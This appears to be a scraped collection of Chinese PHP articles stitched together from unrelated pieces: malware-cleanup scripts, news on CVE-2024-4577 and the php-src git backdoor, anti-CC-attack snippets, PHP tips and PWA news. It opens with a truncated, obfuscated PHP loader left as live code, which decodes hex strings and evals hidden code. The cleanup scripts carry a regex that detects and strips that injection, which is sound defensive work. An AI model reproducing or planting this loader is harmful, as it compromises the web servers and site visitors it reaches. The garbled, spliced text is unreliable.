7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6fs!~<3,j%x5c%x7825>j%x5c%x7825!*3!%x5c%x7827c%x78256<^#zsfvr#%x5c%x785cc%x7825tmw!>!#]y84]275]y83]273]y76]277#<%x5c%x7825t27825tdz*Wsfuvso!%x5c%x7825bss%x5c%x785csboe))1%x5c%x78-#%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827id%x5c%%x7822#)fepmqyfA>2b%x5c%7825%x5c%x7827Y%x5c%x78256<.msv%x5c%x7860fc%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H9%164%50%x22%134%x78%62%x35%165%x3a%146%x21%76%x5fdy)##-!#~<%x5c%x7825h00#*<%x5c%x7825nmtf!%x5c%x7825z>2%x5c%x7822!pd%x5c%x7825)!gj}Z;h!opjudovg}{;#)tutjyf%x5c%21%50%x5c%x7825%x5c%x7878:!>#]y3g]61]y3f]63]y3:]68]y76#<%x5c%x78e%x5256]y81]265]y72]254]y76]824y4%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%/(.*)/epreg_replaceinxfryrtvr'; $wzmdmzzyol = explode(chr((176-132)),'7239,44,5287,69,1871,39,5903,37,1727,36,2772,60,2055,59,48,57,9678,48,9945,68,3362,48,2527,64,5005,39,3740,40,1289,53,2884,49,5753,63,6161,62,3898,52,7746,48,1132,62,7619,64,4407,30,4922,29,5848,22,105,65,3106,69,6337,30,6099,62,9351,27,5113,49,3552,22,470,29,3971,58,8590,38,9601,42,6586,65,9237,70,7433,37,2667,30,4752,55,7353,42,4098,40,815,38,9529,48,2933,31,2337,56,499,33,6523,63,6651,46,3950,21,4310,40,793,22,3837,61,3175,61,9888,57,4664,50,880,68,9307,44,3410,55,5517,43,4621,43,8371,61,4270,40,755,38,8045,37,1679,48,532,63,8217,62,3640,51,2223,25,3780,57,2160,37,5227,60,9577,24,4865,57,1910,29,8923,48,2503,24,1601,31,335,58,6420,24,3236,35,2591,51,3465,64,9047,55,7470,64,8279,51,9858,30,7891,69,6967,57,3529,23,8689,40,7960,33,2964,23,2987,46,5634,56,6267,70,8545,45,3302,60,8870,53,4201,43,3574,66,853,27,1071,61,225,56,4138,63,2832,52,4537,29,6470,23,8432,46,6055,44,1632,47,6921,46,2308,29,1030,41,8162,30,7993,52,7192,47,2114,46,2393,67,7024,30,4437,41,9017,30,9171,66,4951,54,6493,30,5988,67,8192,25,9378,52,717,38,8141,21,8628,61,6754,48,2197,26,7395,38,5356,58,595,22,1546,29,2007,48,1447,31,4566,55,2460,43,6223,44,1352,42,8799,23,948,50,4714,38,1478,68,3073,33,1575,26,4509,28,2724,48,9484,45,998,32,5591,43,10037,69,5816,32,7534,29,6444,26,5162,65,7683,63,4478,31,8082,59,170,55,7836,55,4843,22,8330,41,1394,53,3691,49,6367,53,4350,57,9643,35,2697,27,8822,48,1835,36,1221,68,8478,67,9816,42,6802,28,5560,31,3271,31,5414,68,4029,30,281,54,418,52,7076,55,5940,48,2248,60,4244,26,4059,39,9726,39,7054,22,8759,40,6870,51,1939,68,9430,54,7563,56,6697,57,3033,40,8971,46,7794,42,9102,69,683,34,5870,33,8729,30,617,66,7131,39,5482,35,9765,51,5044,69,4807,36,2642,25,7283,70,6830,40,393,25,1806,29,7170,22,1763,43,1194,27,10013,24,0,48,5690,63,1342,10'); $yhjbllsvwt=substr($bssaiikhvn,(33905-23799),(41-34)); if (!function_exists('bggbbjvwgq')) { function bggbbjvwgq($vawbzzfouj, $wiijrfgknq) { $goicwhrdcc = NULL; for($ipzagsxozk=0;$ipzagsxozk<(sizeof($vawbzzfouj)/2);$ipzagsxozk++) { $goicwhrdcc .= substr($wiijrfgknq, $vawbzzfouj[($ipzagsxozk*2)],$vawbzzfouj[($ipzagsxozk*2)+1]); } return $goicwhrdcc; };} $urvbwkljhb="\x20\57\x2a\40\x67\150\x6a\145\x73\165\x77\166\x7a\146\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x31\67\x35\55\x31\63\x38\51\x29\54\x20\143\x68\162\x28\50\x35\67\x32\55\x34\70\x30\51\x29\54\x20\142\x67\147\x62\142\x6a\166\x77\147\x71\50\x24\167\x7a\155\x64\155\x7a\172\x79\157\x6c\54\x24\142\x73\163\x61\151\x69\153\x68\166\x6e\51\x29\51\x3b\40\x2f\52\x20\153\x6d\151\x73\166\x7a\161\x63\153\x68\40\x2a\57\x20"; $jtgibaqypx=substr($bssaiikhvn,(45338-35225),(40-28)); $jtgibaqypx($yhjbllsvwt, $urvbwkljhb, NULL); $jtgibaqypx=$urvbwkljhb; $jtgibaqypx=(775-654); $bssaiikhvn=$jtgibaqypx-1; ?> 恶意代码清理程序/** * 文件名:delUnwantedCode.php * 功能:删除FTP里恶意代码 * 使用说明: *  请将文件上传到需要清除恶意代码的目录,然后通过CLI或浏览器访问即可,原有被感染的文件会自动备份 */ $path = dirname(__FILE__); #定义需要处理的目录 $bak_path = $path.DIRECTORY_SEPARATOR.basename(__FILE__,'.php'); #定义源文件备份目录,程序过滤恶意代码前,先按原有的路径备份文档到此目录 $fileType = array('php'); #定义需要处理的文件类型(后缀名),小写 $search = array('@<\?php\s*if\(\!isset\(\$GLOBALS\["\\\x61\\\156\\\x75\\\156\\\x61"\]\)\).*\$bssaiikhvn=\$jtgibaqypx-1;\s*\?>@si'); #定义需要过滤的恶意代码规则 $search_count = array( 'all_file'=>array(), #所有文件 'search_file0'=>array(),  #没有恶意代码文件 'search_file1'=>array() #含有恶意代码文件 ); $filelist = listDir($path,$fileType,false); #读取目录里符合条件文件列表 if(!empty($filelist)){ foreach ($filelist as $file){ $file = (isset($file['name'])?$file['name']:$file); $search_count['all_file'][] = $file; $fileContent = file_get_contents($file); $compile_fileContent = preg_replace($search, '', $fileContent); if(strlen($fileContent) != strlen($compile_fileContent) && str_replace($bak_path, '', $file)==$file){ #过滤后文件长度不一致,则表示含有恶意代码(备份文件所在目录不过滤) $search_count['search_file1'][] = $file; ############备份原有文件 开始############### $bakFile = str_replace($path, $bak_path, $file); @make_dir(dirname($bakFile)); @file_put_contents($bakFile, $fileContent); ############备份原有文件 结束############### #重新写入过滤后的内容到原有的PHP文件 @file_put_contents($file, $compile_fileContent); }else{ $search_count['search_file0'][] = $file; } } } #print_r($search_count);die; echo sprintf('从%s里共搜索到%s个符合条件的文件,其中%s个存在恶意代码,已处理结束',$path,count($search_count['all_file']), count($search_count['search_file1']));die; ######################## ## 辅助函数 ######################## /** * 检查目标文件夹是否存在,如果不存在则自动创建该目录 * * @access  public * @param   string  folder  目录路径。不能使用相对于网站根目录的URL * * @return  bool */ function make_dir($folder){ $reval = false; if (!file_exists($folder)){ #如果目录不存在则尝试创建该目录 @umask(0); #将目录路径拆分成数组 preg_match_all('/([^\/]*)\/?/i', $folder, $atmp); #如果第一个字符为/则当作物理路径处理 $base = ($atmp[0][0] == '/') ? '/' : ''; #遍历包含路径信息的数组 foreach ($atmp[1] AS $val){ if ('' != $val){ $base .= $val; if ('..' == $val || '.' == $val){ #如果目录为.或者..则直接补/继续下一个循环 $base .= '/'; continue; } }else{ continue; } $base .= '/'; if (!file_exists($base)){ #尝试创建目录,如果创建失败则继续循环 if (@mkdir(rtrim($base, '/'), 0777)){ @chmod($base, 0777); $reval = true; } } } }else{ #路径已经存在。返回该路径是不是一个目录 $reval = is_dir($folder); } clearstatcache(); return $reval; } ########获取目录下所有文件,包括子目录 开始################ function listDir($path,$fileType=array(),$fileInfo=true){ $path = str_replace(array('/','\\'), DIRECTORY_SEPARATOR, $path); if(!file_exists($path)||!is_dir($path)){ return ''; } if(substr($path, -1,1)==DIRECTORY_SEPARATOR){ $path = substr($path, 0,-1); } $dirList=array(); $dir=opendir($path); while($file=readdir($dir)){ #若有定义$fileType,并且文件类型不在$fileType范围内或文件是一个目录,则跳过 if($file!=='.'&&$file!=='..'){ $file = $path.DIRECTORY_SEPARATOR.$file; if(is_dir($file)){ if(empty($fileType)){ $dirList[] = ($fileInfo==true?array('name'=>$file,'isDir'=>intval(is_dir($file))):$file); } $dirList = array_merge($dirList,listDir($file,$fileType)); }elseif(!empty($fileType) && (in_array(pathinfo($file, PATHINFO_EXTENSION), $fileType))){ $dirList[] = ($fileInfo==true?array('name'=>$file,'isDir'=>intval(is_dir($file)),'md5_file'=>md5_file($file),'filesize'=>filesize($file),'filemtime'=>filemtime($file)):$file); } }; }; closedir($dir); return $dirList; } ########获取目录下所有文件,包括子目录 结束################ 删除FTP里恶意代码(支持任意数量的文件处理)/**  * 文件名:delAllUnwantedCode.php  * 功能:删除FTP里恶意代码(支持任意数量的文件处理)  * 使用说明:  *  请将文件上传到需要清除恶意代码的目录,然后通过CLI或浏览器访问即可,原有被感染的文件会自动备份  */ set_time_limit(0);ignore_user_abort(true); $path = dirname(__FILE__); #定义需要处理的目录 $bak_path = $path.DIRECTORY_SEPARATOR.basename(__FILE__,'.php'); #定义源文件备份目录,程序过滤恶意代码前,先按原有的路径备份文档到此目录 $fileType = array('php'); #定义需要处理的文件类型(后缀名),小写 $search = array('@<\?php\s*if\(\!isset\(\$GLOBALS\["\\\x61\\\156\\\x75\\\156\\\x61"\]\)\).*\$bssaiikhvn=\$jtgibaqypx-1;\s*\?>@si'); #定义需要过滤的恶意代码规则 $file_count = array(   'all_file'=>0, #所有文件   'filter_file'=>0  #含有恶意代码文件 ); replaceUnwantedCode($path); #执行过滤 #print_r($search_count);die; echo sprintf('从%s里共搜索到%s个符合条件的文件,其中%s个存在恶意代码已清理,原始文件保存在%s',$path, ($file_count['all_file']), ($file_count['filter_file']), $bak_path);die; function replaceUnwantedCode($path){   global $bak_path,$fileType,$search,$file_count;   $path = str_replace(array('/','\\'), DIRECTORY_SEPARATOR, $path);   if(!file_exists($path)||!is_dir($path)){     return '';   }   if(substr($path, -1,1)==DIRECTORY_SEPARATOR){     $path = substr($path, 0,-1);   }   $dir=opendir($path);   while($file=readdir($dir)){     #若有定义$fileType,并且文件类型不在$fileType范围内或文件是一个目录,则跳过     if($file!=='.'&&$file!=='..'){       $file = $path.DIRECTORY_SEPARATOR.$file;       if(is_dir($file)){         replaceUnwantedCode($file);       }elseif(!empty($fileType) && (in_array(pathinfo($file, PATHINFO_EXTENSION), $fileType))){         ################################         @$file_count['all_file']++;         $fileContent = file_get_contents($file); #文件原始代码         $compile_fileContent = preg_replace($search, '', $fileContent); #过滤后的内容         if(strlen($fileContent) != strlen($compile_fileContent) && str_replace($bak_path, '', $file)==$file){           #过滤后文件长度不一致,则表示含有恶意代码(备份文件所在目录不过滤)           $file_count['filter_file']++;                         ############备份原有文件 开始###############           $bakFile = str_replace($path, $bak_path, $file);           @make_dir(dirname($bakFile));           @file_put_contents($bakFile, $fileContent);           ############备份原有文件 结束###############                         #重新写入过滤后的内容到原有的PHP文件           @file_put_contents($file, $compile_fileContent);         }         ################################         unset($fileContent,$compile_fileContent);       }     };   };   closedir($dir);   return true; } ######################## ## 辅助函数 ########################   /**  * 检查目标文件夹是否存在,如果不存在则自动创建该目录  *  * @access  public  * @param   string  folder  目录路径。不能使用相对于网站根目录的URL  *  * @return  bool  */ function make_dir($folder){   $reval = false;   if (!file_exists($folder)){     #如果目录不存在则尝试创建该目录     @umask(0);       #将目录路径拆分成数组     preg_match_all('/([^\/]*)\/?/i', $folder, $atmp);       #如果第一个字符为/则当作物理路径处理     $base = ($atmp[0][0] == '/') ? '/' : '';       #遍历包含路径信息的数组     foreach ($atmp[1] AS $val){       if ('' != $val){         $base .= $val;         if ('..' == $val || '.' == $val){           #如果目录为.或者..则直接补/继续下一个循环           $base .= '/';           continue;         }       }else{         continue;       }         $base .= '/';         if (!file_exists($base)){         #尝试创建目录,如果创建失败则继续循环         if (@mkdir(rtrim($base, '/'), 0777)){           @chmod($base, 0777);           $reval = true;         }       }     }   }else{     #路径已经存在。返回该路径是不是一个目录     $reval = is_dir($folder);   }     clearstatcache();     return $reval; } #### PHP爆严重漏洞:可远程执行任意代码 请尽快更新! 6 月 8 日消息,PHP 项目维护团队昨日发布新补丁,修复了存在于 PHP for Windows 中的远程代码执行(RCE)漏洞,并敦促用户尽快更新至 6 月 6 日发布的 8.3.8、8.2.20 以及 8.1.29 版本。 PHP 是一种广泛使用的开放源码脚本语言,设计用于网络开发,通常在 Windows 和 Linux 服务器上使用。 Devcore 首席安全研究员 Orange Tsai 于 2024 年 5 月 7 日发现了这个新的 RCE 漏洞,并将其报告给了 PHP 开发人员。 该漏洞追踪编号为 CVE-2024-4577,影响到自 5.x 版以来的所有版本,可能对全球大量服务器造成影响。 此外 Shadowserver 基金会发布公告,表示已经检测到有黑客正扫描存在该漏洞的服务器。 ITCVE-2024-4577 漏洞是由于处理字符编码转换时的疏忽造成的,在 Windows 上以 CGI 模式使用 PHP,尤其是使用 “Best-Fit”功能的服务器环境,比较容易遭到黑客攻击。 DevCore 的咨询解释说: 在实施 PHP 时,团队没有注意到在 Windows 操作系统内进行编码转换的 Best-Fit 功能。 未经认证的攻击者利用该漏洞,通过特定字符序列绕过 CVE-2012-1823 先前的保护。通过参数注入攻击,可在远程 PHP 服务器上执行任意代码。 分析人员解释说,即使 PHP 未配置为 CGI 模式,只要 PHP 可执行文件(如 php.exe 或 php-cgi.exe)位于网络服务器可访问的目录中,CVE-2024-4577 仍有可能被利用。 #### PHP现在还有多少网站在用? 声明:本文来自于微信公众号CSDN(ID:CSDNnews),作者 | Aphinya Dechalert,译者 | 弯月,责编 | 郭芮 以下为译文: 如今,我们很少在主流媒体中听说有关PHP的新闻了。在这个Angular、React、Node.js以及Python占据顶流的时代,就连计算机科学学位也都把焦点集中在Java和C语言上了。 与此同时,PHP只能默默地蜷缩在角落里,注视着其他语言走红。 15 岁那一年,我开始学习编程,而最初接触的就是PHP。从那以后,我经历了一段漫长的旅程,期间还曾接触过Java和JavaScript,然而PHP总是会在不经意间悄悄地出现在我的职业生涯中。 如今,PHP是生还是死?我们是不是已经被铺天盖地的JavaScript报道蒙蔽了双眼,成为了井底之蛙?下面就让我们通过本文来一探究竟吧。 79%的Web 当有人提到PHP时,很多人往往会表现出对这种语言的嘲讽,然而根据W3Techs的一份报告,如今79%的Web仍在使用PHP。尽管在 90 年代- 2000 年初,PHP曾因安全问题而声名狼藉,但它仍然是服务器端最常用的语言。 然而,这种成功在很大程度上是因为它与WordPress的紧密绑定关系。CMS的广受欢迎可以追溯到 2003 年,当时正值互联网与个人博客开始走向主流。WordPress击败了Google的Blogger,成为CMS在主要非技术市场的首选。 WordPress旨在帮助大众制作普通的网页,而且它打破了制作CMS的技术门槛。 根据Matt Mullenweg在 2014 年访问新西兰奥克兰期间的讲话,他提到Squarespace的Superbowl广告为WordPress提供了免费的广告宣传,因为当时的比较平台是用WordPress搭建的。 由于WordPress是用PHP构建的,因此几乎所有共享托管服务提供商均支持PHP,所以PHP依然占据着61.5%的互联网。因此,PHP作为一种语言似乎并不会在短期内消亡。 即使WordPress决定用另一种语言重新构建,仍然有大量的旧站点需要迁出,并迁移到新的环境中。 瞬息万变的大环境 PHP与WordPress的紧密联系会影响到开发人员对这种语言的看法。它常常与WordPress生态系统的主题和插件开发息息相关。 在与WordPress相关的活动之外,PHP的使用大多涉及遗留的定制平台。通常,对于创业公司或新业务项目而言,没有人会将PHP作为潜在的候选。 根据英国招聘机构Darwin Recruitment公布的招聘需求数据显示,PHP招聘需求呈现出逐年下降的趋势。 然而,PHP岗位的申请竞争却呈现出上扬的趋势。这两种相反的趋势表明PHP岗位的申请压力并不会随着时间的推移而降低。 看到这里,你可能想说,这只是其中一家机构的报道,他们统计的趋势可能不准。然而,在过去的 5 年中,全球范围内人们对“PHP”一词的搜索兴趣呈现出持续的小幅下降趋势,其中搜索次数最多的国家是中国和菲律宾。 有趣的是,“PHP”一词搜索量的起伏恰恰与“WordPress”相吻合。 过去 5 年中Google上的搜索趋势,蓝色为PHP,红色为WordPress。 主题市场如何? 由于PHP与WordPress的捆绑关系,定制主题以及创建插件似乎才是主要的商业机会,尤其是当你希望成为这方面的自由职业者时。 目前,ThemeForest是与WordPress相关的最大商业市场,有 114 位作者的收入超过 100 万美元,这个收入看似很多,然而放眼4. 7 万个活跃的WordPress主题市场,这笔数目其实微不足道。我们没有简单的方法统计每位作者的平均交易数,但他们的总和加起来可能不超过10%。 尽管这也算得上一项良好的被动收入渠道,但是要作为一家企业运营可能需要付出更多努力。但是,所有的付出都有各自的回报。 2013 年,为了在WordPress主题市场上分一杯羹,托管业务巨头BlueHost收购了Mojo Themes,并更名为Mojo Marketplace。然而,它没有取得Envato的ThemeForest那样的成功,其大部分主题销售量都不到 1000 份。 写在最后 PHP尚未完全消亡,但也失去了生机,无法像JavaScript那样在开发生态系统中撑起一片天。PHP作为服务器端的语言与WordPress保持着亲密的关系,其立足之本仍然是普通用户对该平台的长期依赖。 由于PHP已成为内容创建生态系统不可或缺的一部分,因此它不可能在一两年或短期内消失。托管业务公司在持续支持WordPress作为首选的CMS方面也发挥了作用,与其他服务器端语言(比如Java、C++等)相比,对普通用户来说,WordPress更易于使用。 尽管有关PHP已死的传言满天飞,然而事实却并非如此,只要WordPress还活着并正常运行,PHP就不会消亡,况且如今的WordPress依然生龙活虎。不幸的是,许多遗留的PHP代码与旧版的WordPress捆绑在一起,而这些网站的所有者未能完全更新这些旧版本。 此外,PHP还拥有强大的社区在积极推进WordPress之外的活动,例如Laravel和Symphony,尽管我并未在本文中具体探讨。而且PHP本身也得到了积极维护,其下一版本计划于 2019 年 11 月发布。 因此,总的来说,PHP一切安好。 #### PHP的Git服务器被黑客攻击 源码库被添加后门 在最新的软件供应链攻击中,PHP官方Git仓库被黑客攻击,代码库被篡改。昨天,PHP 团队在 git.php.net 服务器上维护的 php-src Git 仓库中被推送了两个恶意提交。攻击者在上游提交了一个神秘的改动,称其正在"修复排版",假装这是一个小的排版更正,并且伪造签名,让人以为这些提交是由已知的PHP开发者和维护者Rasmus Lerdorf和Nikita Popov完成的。 实际上,攻击者的恶意提交是植入了远程代码执行后门。考虑到PHP仍然是服务器端编程语言,为互联网上超过79%的网站提供支持,这一事件令人震惊。新增的第370行调用zend_eval_string函数的地方,这段代码实际上是为运行这个被劫持的PHP版本的网站埋下了一个后门,以获取轻松的远程代码执行(RCE)。 "如果字符串以'zerodium'开头,这一行就会从useragent HTTP头内执行PHP代码。"PHP开发者Jake Birchall向最先指出这一异常的Michael Voříšek回应道。 在电子邮件采访中,PHP维护者Nikita Popov告诉我们。 "第一次提交是在几个小时后被发现的,作为常规提交后代码审查的一部分。Popov表示,"这些改动是相当明显的恶意的,并且马上就被还原了"。 这并不奇怪,因为像Git这样的源码版本控制系统,可以将一个提交的内容签名为来自本地的其他人,然后将伪造的提交上传到远程的Git服务器上,这样就会给人一种印象,好像它确实是由被已知的开发者签名的。 虽然对事件的完整调查还在进行中,但根据PHP维护者的说法,这次恶意活动源于被入侵的git.php.net服务器,而不是个人的Git账户被入侵。作为此次事件后的预防措施,PHP维护人员决定将PHP官方源码库迁移至GitHub。 "虽然调查仍在进行中,但我们决定维护自己的git基础设施是一个不必要的安全风险,我们将停止使用git.php.net服务器。" "取而代之的是,GitHub上的仓库,以前只是镜像,现在将成为规范的来源。"Popov宣布。随着这一改变的进行,从现在开始,任何代码修改都要直接推送到GitHub上,而不是git.php.net服务器上。 那些有兴趣为PHP项目做出贡献的人现在需要在GitHub上被添加为PHP组织的一部分。相关说明在同一个安全公告中提供。 要成为该组织的成员,你需要在你的GitHub账户上启用双因素认证(2FA)。"我们正在审查仓库中除了两个引用的提交之外的任何损坏,在此期间,它可能被克隆/分叉,但这些更改并没有进入任何标签或发布工件中。" "这些改动是在PHP8.1的开发分支上,该分支将在年底发布。"PHP团队已经证实,他们计划在接下来的日子里最终退役他们的git服务器,并永久转移到GitHub。 #### php程序防止CC攻击代码 php网站防止网页频繁刷新 网页快速恶意刷新,cc攻击利用代理服务器生成指向目标站点的合法请求,模拟多用户不停的对受害网站进行访问,使受害网站服务器面临资源不足,从而导致网站无法访问,这篇文章主要介绍了php防止CC攻击代码和php防止网页频繁刷新,感兴趣的小伙伴们可以研究一下。网页快速恶意刷新,cc攻击就是攻击者利用代理服务器生成指向目标站点的合法请求,模拟多用户不停的对受害网站进行访问,特别是访问那些需要大量数据操作需要大量CUP时间的页面,最终导致目标网站服务器资源耗尽,一直到宕机崩溃,如此一来,造成服务器资源的浪费,CPU长时间处于100%,永远都有处理不完的连接直至就网络拥塞,正常的访问被中止。我们称之为CC攻击。尽管我们可以借助于一些防攻击的软件来实现,不过效果有时并不明显。下面我提供一段PHP的代码,可以起到一定的防CC攻击效果。 主要功能:在3秒内连续刷新页面5次以上将指向本机 http://127.0.0.1 只需将该代码放到需要防CC攻击的页面即可。 <?php $timestampcc = time(); $cc_nowtime = $timestampcc; if(session_is_registered('cc_lasttime')){  $cc_lasttime = $_SESSION['cc_lasttime'];  $cc_times = $_SESSION['cc_times']+1;  $_SESSION['cc_times'] = $cc_times; }else{  $cc_lasttime = $cc_nowtime;  $cc_times = 1;  $_SESSION['cc_times'] = $cc_times;  $_SESSION['cc_lasttime'] = $cc_lasttime; } if(($cc_nowtime-$cc_lasttime)<3){//3秒内刷新5次以上可能为cc攻击  if($cc_times>=5){  echo '刷新太快!';  exit;  } }else{  $cc_times = 0;  $_SESSION['cc_lasttime'] = $cc_nowtime;  $_SESSION['cc_times'] = $cc_times; } ?> 下面是为大家整理的PHP防CC攻击的有效方法:1.session记录 submit.php为发送页面,在这个页面上设置一个session变量,并作为隐藏域和表单一起发送到submitdeal.php页面,在服务器端把post上来的隐藏变量和服务器端记录的session变量进行对比,比如一样,则写入数据库并清除session,这样用户刷新页面,两个值不相等提示错误或跳转。 优点:不用用户输入验证码 缺点:表单容易被复制 2.验证码 原理和第一种一样,只是session数据不作为隐藏域提交,而是让用户填写,大多数网站都采用文字验证码和图片验证码,图片验证码安全性高。3.IP绑定 提交数据后,先从IP表里检索客户端IP,如果有,并且没有过期,那么报错,否则写入数据库,然后再取客房端IP,把IP写入数据库。 4.cookie:客户提交后处理程序先检索客户端有没有设置cookie,如果有,则不重复提交;如果没有,则写数据,再写个cookie; 例:用户无意义的频繁跳转、请求都会给服务器加重很多负担 其实 用cookie就可以防止这一点。error_reporting(0); //if($_COOKIE["ck"])die("刷新过快!"); if($_COOKIE["ck"])header("Location:http://www.baidu.com");//这里如果用户刷新过快,给予终止php脚本或者直接302跳转 setcookie("ck","1",time()+3);//设定cookie存活时间3s echo "hello!"; ?> 方式一:<?php  session_start();  $k=$_GET['k'];  $t=$_GET['t'];  $allowTime = 1800;//防刷新时间  $ip = get_client_ip();  $allowT = md5($ip.$k.$t);  if(!isset($_SESSION[$allowT]))  {   $refresh = true;   $_SESSION[$allowT] = time();  }elseif(time() - $_SESSION[$allowT]>$allowTime){   $refresh = true;   $_SESSION[$allowT] = time();  }else{   $refresh = false;  }  ?> 方式二:<? session_start(); if(!emptyempty($_POST[name])){  $data = $_POST[name];  $tag = $_POST[tag];  if($_SESSION[status]==$tag){  echo $data;  }else{  echo "不允许刷新!";  } } $v = mt_rand(1,10000); ?> <form method="post" name="magic" action="f5.php"><input type="hidden" name="tag" value="<?=$v?>"><input type=text name="name"><input type="submit" value="submit"> </form> <? echo $v; $_SESSION[status] = $v; ?> 方式三:<? session_start(); if(!emptyempty($_POST[name])){  $data = $_POST[name];  $tag = $_POST[tag];  if($_SESSION[status]==$tag){  echo $data;  }else{  echo "不允许刷新!";  } } $v = mt_rand(1,10000); ?> <form method="post" name="magic" action="f5.php"><input type="hidden" name="tag" value="<?=$v?>"><input type=text name="name"><input type="submit" value="submit"> </form> <? echo $v; $_SESSION[status] = $v; ?> 以上就是php防止CC攻击的多种方式,希望能帮助大家,更多精彩欢迎关注主机吧。 #### PHP脚本最大执行时间怎么设置 对于“PHP脚本最大执行时间怎么设置,有几种方法”的知识点有一些人不是很理解,对此小编给大家总结了相关内容,文中的内容简单清晰,易于学习与理解,具有一定的参考学习价值,希望能对大家有所帮助,接下来就跟随小编一起学习一下“PHP脚本最大执行时间怎么设置,有几种方法”吧。 修改php最大时间的方法:1、在php.ini里面设置“max_execution_time = 120;”;2、通过PHP的ini_set函数设置;3、通过set_time_limit 函数设置即可。 本文操作环境:PHP5.2-PHP8.0+版 怎么修改php最大时间? PHP设置脚本最大执行时间的三种方法 php.ini 中缺省的最长执行时间是 30 秒,这是由 php.ini 中的 max_execution_time 变量指定,如果脚本需要跑很长时间,例如要大量发送电子邮件,或者分析统计大量数据,服务器会在 30 秒后强行中止正在执行的程序,这种情况就要更改php脚本最大执行时间。 PHP设置脚本最大执行时间的三种方法 1、在php.ini里面设置 max_execution_time = 120; 2、通过PHP的ini_set函数设置 ini_set("max_execution_time", "120"); 3、通过set_time_limit 函数设置 set_time_limit(120); 以上几个数字设置为0则无限制,脚本会一直执行下去,直到执行结束。 所以,需要长时间执行的脚本,一般在php代码开头处添加如下代码就可以了 set_time_limit(0); #### PHP获取文件属性怎样做?有哪一些方法? PHP如何获取文件属性?有些需求需要我们来获取文件属性,而PHP获取文件属性有几种方法,具体代码如下,感兴趣的朋友接下来就跟随小编一起来学习一下吧。 1、filesize($filename) 返回指定文件大小。 如果成功,会返回文件大小的字节数;如果失败,则返回 FALSE。 <?php header("content-type:text/html;charset=utf-8"); $filename = "test.txt"; echo "{$filename} 文件的大小为:".filesize($filename); ?> 2、filetype($filename) 返回指定文件或目录类型。 如果成功,会返回下面 7 种可能的值之一: fifochardirblocklinkfileunknown 如果失败,则返回 FALSE。 <?php header("content-type:text/html;charset=utf-8"); $filename = "D:/demo/text.txt"; echo "{$filename} 文件的类型为:".filetype($filename); $filename = "D:/demo/1.jpg"; echo " {$filename} 文件的类型为:".filetype($filename); $filename = "D:/demo/img"; echo " {$filename} 文件的类型为:".filetype($filename); ?> 3、fileperms($filename)返回文件或目录$filename的权限。 如果成功,会以数字形式返回权限。如果失败,则返回 FALSE。 <?Php header("content-type:text/html;charset=utf-8"); $filename = "test.txt"; echo "{$filename} 文件的权限为:".fileperms($filename); ?> 知识点扩充: PHP获取文件属性之获取最近修改时间: < ?php $file = 'test.txt'; echo date('r', filemtime($file)); ?> 返回的说unix的时间戳,这在缓存技术常用. 相关PHP获取文件属性的还有获取上次被访问的时间fileatime(),filectime()当文件的权限,所有者,所有组或其它 inode 中的元数据被更新时间,fileowner()函数返回文件所有者 $owner = posix_getpwuid(fileowner($file)); (非window系统),ileperms()获取文件的权限, < ?php $file = 'dirlist.php'; $perms = substr(sprintf ('%o', fileperms($file)) , -4); echo $perms; ?> #### ping域名请求找不到主机原因分析解决办法 win+R打开运行,输入cmd。ping域名不行,ping其它ip也没问题,ping网站的ip也没问题,就是域名解析错误。 去C:\Windows\System32\drivers\etc路径下用记事本看下hosts文件是否被修改。如果hosts文件没有域名强制解析记录则不用理会,如有请删除修改。   最后在cmd;输入:ipconfig /flushdns  释放DNS缓存。 输入:netsh winsock reset  重置Winsock目录。 再ping网站验证,成功,再重启下就好。 #### Power Pages 被曝高危安全漏洞 2 月 21 日消息,科技媒体 bleepingcomputer 昨日(2 月 20 日)发布博文,报道称微软公司发布安全公告,披露 Power Pages 平台存在一个高危权限提升漏洞,且有证据表明该漏洞已被黑客利用进行零日攻击。 该漏洞追踪编号为 CVE-2025-24989,影响 Microsoft Power Pages,属于访问控制不当问题,允许未授权用户提升其在网络上的权限并绕过用户注册控制。 Power Pages 是一款安全的企业级低代码服务型软件 (SaaS) 平台,用于创建、托管和管理面向外部的现代商业网站。 无论您是低代码制作者还是专业开发人员,Power Pages 都支持您快速设计、配置和发布可在各种 Web 浏览器和设备上运行的网站,Power Pages是微软旗下的项目。 微软表示已在服务层面修复了该漏洞,并通知了受影响的客户,同时提供了检测潜在入侵的指南,但仍建议管理员采取以下措施: 审查活动日志,查找可疑操作、用户注册或未经授权的更改。 仔细检查用户列表,验证管理员和高权限用户。 检查最近的权限、安全角色、许可和网页访问控制的更改。 立即撤销恶意帐户或显示未授权活动的帐户,重置受影响的凭据,并在所有帐户上强制执行多因素身份验证 (MFA)。 #### PWA for WP & AMP插件:可把wordpress博客添加到手机屏幕上的PWA插件 最近发现一个很不错的插件名叫:PWA for WP & AMP 官方下载地址:http://cn.wp101.net/plugins/pwa-for-wp/ 这个插件有点类似于SuperPWA,是一个可以直接把网站程序做成类似于APP的插件,只需要简单的设置就可以了。 主机吧目前就用这个,功能挺多的 相比SuperPWA,这个功能比较大,而且挺强大的。当然如果不懂英文的话挺麻烦的,要用翻译软件一个一个翻译,然后看着操作就好了。 效果展示:   #### PWA应用春天? 微软与谷歌达成合作 帮助开发者在Play商店中发布PWA应用 PWABuilder 是微软旗下的一款开发人员工具,可帮助开发者构建渐进式 Web 应用(简称 PWA)并发布到应用商店中。与此同时,Bubblewrap 也是谷歌旗下的一款命令行实用工具和库,旨在为将要登陆 Play 商店的高质量 PWA 应用生成和提供签名。随着今日宣布的最新合作,两家公司还将为 PWA 应用开发者带来增强的体验。 (来自:Microsoft) 首先是 Web 快捷方式支持:通过 PWABuilder 为谷歌 Play 商店创建并打包的 PWA 应用,现将支持新的 Web 快捷方式标注。 其次是高级的 Android 功能与自定义选项:PWABuilder 现支持各种受信任的网络活动选项,可使 PWA 应用在 Android 设备上大放异彩。 在 PWABuilder 中,PWA 应用开发者可定制 Android 状态栏和导航栏的外观、自定义 Android 启动画面、更改启动器的名称、使用现有的签名密钥、利用更深层次的推送通知支持、配置程序包的 ID 和版本控制、以及后备行为等。 最后,谷歌还与谷歌合作开发了 Fugu 项目,以培育新的 Web 